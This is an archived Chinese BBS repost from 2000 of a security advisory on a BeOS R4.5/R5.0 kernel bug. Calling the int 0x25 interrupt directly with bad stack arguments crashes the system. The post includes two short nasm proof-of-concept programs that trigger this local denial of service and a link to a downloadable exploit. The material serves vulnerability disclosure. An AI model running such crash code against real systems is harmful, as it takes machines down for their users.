荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: bstone (Sealed!), 信区: Hacker
标 题: BeOS 系统调用问题
发信站: BBS 荔园晨风站 (Wed Apr 12 09:04:40 2000), 转信
发信人: cloudsky (小四), 信区: Security
标 题: BeOS 系统调用问题
发信站: 武汉白云黄鹤站 (Tue Apr 11 19:20:25 2000), 站内信件
漏洞名称:BeOS 系统调用问题
类 型:本地 DoS
发布日期: 2000-04-10
更新日期: 2000-04-11
受影响的系统: BeOS R4.5.x、BeOS R5.0
不受影响的系统:
描述:
如果通过int 0x25中断直接进行内核调用,而不是通过
libroot.so动态链接库提供的库函数间接进行内核系统
调用,此时绝大多数系统调用对于无效的参数/堆栈没
有做容错处理,进而导致BeOS崩溃。尽管R5.0版之前就
发现了这个问题,但R5.0版本并没有修正这个问题。至
少在所有的R4.5.x版本中存在同样的问题。
暂时没有补丁可用,这是内核的问题。
这里有一个简单的汇编程序可以杀死BeOS(nasm):
------------------------------------------------------
section .text
global _start
_start:
push dword msg
push dword len
push dword 1 ;stdout
mov eax,3 ;sys_write
int 0x25 ;must be a *call* to int 0x25,
;then everything goes ok; i.e.
;return address must be on the stack,
;but it is not
mov eax,0x3f ;sys_exit
int 0x25
msg db "hello",0xa
len equ $ - msg
------------------------------------------------------
测试程序:
可以从这里下载二进制可执行文件以及源代码:
http://linuxassembly.org/BeDie.tgz
;Copyright (c) 2000 Konstantin Boldyshev <konst@linuxassembly.org>
;
;This was an attempt to write string to stdout, but..
;BeOS dies silently on such a program -- kernel bug
;
;to compile:
;
;nasm -f elf bedie.asm
;ld -s -o bedie bedie.o
section .text
global _start
_start:
push dword msglen ;message length
push dword msg ;message
push dword 1 ;stdout
mov eax,0x03 ;sys_write
int 0x25
mov eax,0x3f ;sys_exit
int 0x25
msg db "Suicide",0xa
msglen equ $ - msg
漏洞发现者以及相关联结:
Konstantin Boldyshev < mailto: konst@linuxassembly.org >
http://bebugs.be.com/devbugs/detail.php3?oid=2324160
http://linuxassembly.org/BeDie.tgz -- 攻击测试程序
http://linuxassembly.org -- Linux/Unix汇编编程
http://www.escribe.com/software/bedevtalk/
解决方案:
暂无
--
我问飘逝的风:来迟了?
风感慨:是的,他们已经宣战。
我问苏醒的大地:还有希望么?
大地揉了揉眼睛:还有,还有无数代的少年。
我问长空中的英魂:你们相信?
英魂带着笑意离去:相信,希望还在。
※ 来源:.武汉白云黄鹤站 bbs.whnet.edu.cn.[FROM: 203.207.226.124]
--
Live my life!?
※ 来源:·BBS 荔园晨风站 bbs.szu.edu.cn·[FROM: 192.168.28.106]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店